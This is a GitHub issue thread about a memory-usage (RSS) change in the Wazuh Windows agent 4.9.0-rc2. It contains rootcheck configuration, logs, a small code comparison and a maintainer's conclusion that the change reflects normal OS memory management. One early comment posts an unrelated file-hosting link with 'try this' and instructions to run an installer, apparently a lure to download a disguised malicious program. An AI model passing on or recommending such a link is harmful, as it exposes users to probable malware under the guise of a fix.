### ISSUE TITLE
Footprint - Change in RSS of Windows Agent

### ISSUE THREAD

**Issue by joaquinsgi** [wazuh/wazuh#25573]
|Wazuh version|Component|Install type|Install method|Platform|
|---|---|---|---|---|
| 4.9.0-rc2 | Wazuh Agent | Agent | Packages | Windows |

## Description

During the tests of: [Release 4.9.0 - RC 2 - Footprint Metrics - ROOTCHECK (2.5d)](https://github.com/wazuh/wazuh/issues/25517), a change in the Windows agent was detected in the RSS plot, which was not seen in previous versions.

- 4.9.0 RC 2

![image](https://github.com/user-attachments/assets/904efb48-78ee-4206-9d45-5612383b1433)

- 4.9.0 RC 1

![image](https://github.com/user-attachments/assets/9fd31b59-e484-4322-9cfc-02c338b0886e)

- 4.8.1 RC 2

![image](https://github.com/user-attachments/assets/835651bf-a5ca-4e4e-b51d-9d895de0787e)

### Evidences
[ossec_Test_stress_B5567_windows_2024-09-02.zip](https://github.com/user-attachments/files/16871217/ossec_Test_stress_B5567_windows_2024-09-02.zip)

**Comment by YousefNabil8** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by cborla** [comment]
## Analysis

### Configuracion
The configuration is the same for both versions, the only change is the syscheck sample rate but the functionality is disabled.

ossec.conf file - rootcheck configuration.

``` xml
  <rootcheck>
    <disabled>no</disabled>
    <frequency>60</frequency>
    <windows_apps>./shared/win_applications_rcl.txt</windows_apps>
    <windows_malware>./shared/win_malware_rcl.txt</windows_malware>
  </rootcheck>
  <sca>
```

### Log messages
There is no difference in the logs, the sequence is always the same, start a rootcheck scan, stop after 5 minutes, wait 1 minute and run the scan again.

``` log
2024/09/01 17:03:35 rootcheck: INFO: Starting rootcheck scan.
2024/09/01 17:03:40 rootcheck: INFO: Ending rootcheck scan.
2024/09/01 17:04:41 rootcheck: INFO: Starting rootcheck scan.
2024/09/01 17:04:46 rootcheck: INFO: Ending rootcheck scan.
```
### Code compare [4.8.1 vs v4.9.-rc2](https://github.com/wazuh/wazuh/compare/v4.8.1...v4.9.0-rc2) 
The code difference is small, and does not affect the observed behaviour. 

- `etc/templates/config/generic/rootcheck.agent.template`
The 2 ignore are added

```xml
    <rootkit_trojans>etc/shared/rootkit_trojans.txt</rootkit_trojans>

    <skip_nfs>yes</skip_nfs>

    <ignore>/var/lib/containerd</ignore>
    <ignore>/var/lib/docker/overlay2</ignore>
  </rootcheck>
```

- `src/rootcheck/rootcheck.c`
A variable is initialised to null
``` c
rootcheck.ignore_sregex = NULL;
```
### Metrics
Memory usage can be seen to go up and down in blocks, so it can be presumed that this is memory release by the OS.
![image](https://github.com/user-attachments/assets/e66845ec-e0d4-4cac-9201-d50b4c583231)

### Conclusion
- It doesn't appear to be a real problem, just memory management by the OS.
- No ramping or other alarming patterns are observed.
